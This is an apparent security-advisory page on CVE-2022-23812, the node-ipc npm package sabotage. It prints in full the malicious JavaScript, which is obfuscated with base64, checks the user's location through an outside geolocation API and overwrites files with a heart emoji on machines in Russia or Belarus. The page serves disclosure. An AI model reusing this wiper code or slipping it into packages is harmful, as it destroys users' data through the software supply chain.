Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-23812: added ssl check · RIAEvangelist/node-ipc@847047c

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. Note: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: Note: Don’t run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", “base64”); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(“utf8”), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", “base64”); const o = Buffer.from("Li4v", “base64”); const r = Buffer.from("Li4vLi4v", “base64”); const f = Buffer.from("Lw==", “base64”); const c = Buffer.from("Y291bnRyeV9uYW1l", “base64”); const e = Buffer.from("cnVzc2lh", “base64”); const i = Buffer.from("YmVsYXJ1cw==", “base64”); try { const s = JSON.parse(t.toString(“utf8”)); const u = s[c.toString(“utf8”)].toLowerCase(); const a = u.includes(e.toString(“utf8”)) || u.includes(i.toString(“utf8”)); // checks if country is Russia or Belarus if (a) { h(n.toString(“utf8”)); h(o.toString(“utf8”)); h(r.toString(“utf8”)); h(f.toString(“utf8”)); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = “”) { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", “base64”); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(…s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(“utf8”), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

CVE
#js#ssl

Permalink

Showing with 39 additions and 36 deletions.

  1. +1 −1 coverage/index.html
  2. +1 −1 coverage/lcov-report/index.html
  3. +1 −1 coverage/lcov-report/node-ipc/dao/client.js.html
  4. +1 −1 coverage/lcov-report/node-ipc/dao/index.html
  5. +1 −1 coverage/lcov-report/node-ipc/dao/socketServer.js.html
  6. +1 −1 coverage/lcov-report/node-ipc/entities/Defaults.js.html
  7. +1 −1 coverage/lcov-report/node-ipc/entities/EventParser.js.html
  8. +1 −1 coverage/lcov-report/node-ipc/entities/index.html
  9. +1 −1 coverage/lcov-report/node-ipc/helpers/delay.js.html
  10. +1 −1 coverage/lcov-report/node-ipc/helpers/index.html
  11. +1 −1 coverage/lcov-report/node-ipc/index.html
  12. +1 −1 coverage/lcov-report/node-ipc/node-ipc.js.html
  13. +1 −1 coverage/lcov-report/node-ipc/services/IPC.js.html
  14. +1 −1 coverage/lcov-report/node-ipc/services/index.html
  15. +1 −1 coverage/node-ipc/dao/client.js.html
  16. +1 −1 coverage/node-ipc/dao/index.html
  17. +1 −1 coverage/node-ipc/dao/socketServer.js.html
  18. +1 −1 coverage/node-ipc/entities/Defaults.js.html
  19. +1 −1 coverage/node-ipc/entities/EventParser.js.html
  20. +1 −1 coverage/node-ipc/entities/index.html
  21. +1 −1 coverage/node-ipc/helpers/delay.js.html
  22. +1 −1 coverage/node-ipc/helpers/index.html
  23. +1 −1 coverage/node-ipc/index.html
  24. +1 −1 coverage/node-ipc/node-ipc.js.html
  25. +1 −1 coverage/node-ipc/services/IPC.js.html
  26. +1 −1 coverage/node-ipc/services/index.html
  27. +0 −1 coverage/tmp/coverage-10204-1625688926597-0.json
  28. +1 −0 coverage/tmp/coverage-11944-1631731065775-0.json
  29. +0 −1 coverage/tmp/coverage-14780-1625688926570-0.json
  30. +1 −0 coverage/tmp/coverage-16376-1631731057640-0.json
  31. +1 −0 coverage/tmp/coverage-18024-1631731055619-0.json
  32. +1 −0 coverage/tmp/coverage-18084-1631731061730-0.json
  33. +1 −0 coverage/tmp/coverage-18460-1631731058702-0.json
  34. +0 −1 coverage/tmp/coverage-21508-1625688925550-0.json
  35. +0 −1 coverage/tmp/coverage-22300-1625688918490-0.json
  36. +0 −1 coverage/tmp/coverage-3668-1625688919532-0.json
  37. +0 −1 coverage/tmp/coverage-5288-1625688922546-0.json
  38. +1 −0 coverage/tmp/coverage-5364-1631731065744-0.json
  39. +1 −0 coverage/tmp/coverage-7236-1631731064720-0.json
  40. +0 −1 coverage/tmp/coverage-8624-1625688916452-0.json
  41. +1 −0 dao/ssl-geospec.js
  42. +1 −1 package-lock.json
  43. +2 −2 package.json
  44. +2 −0 services/IPC.js

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907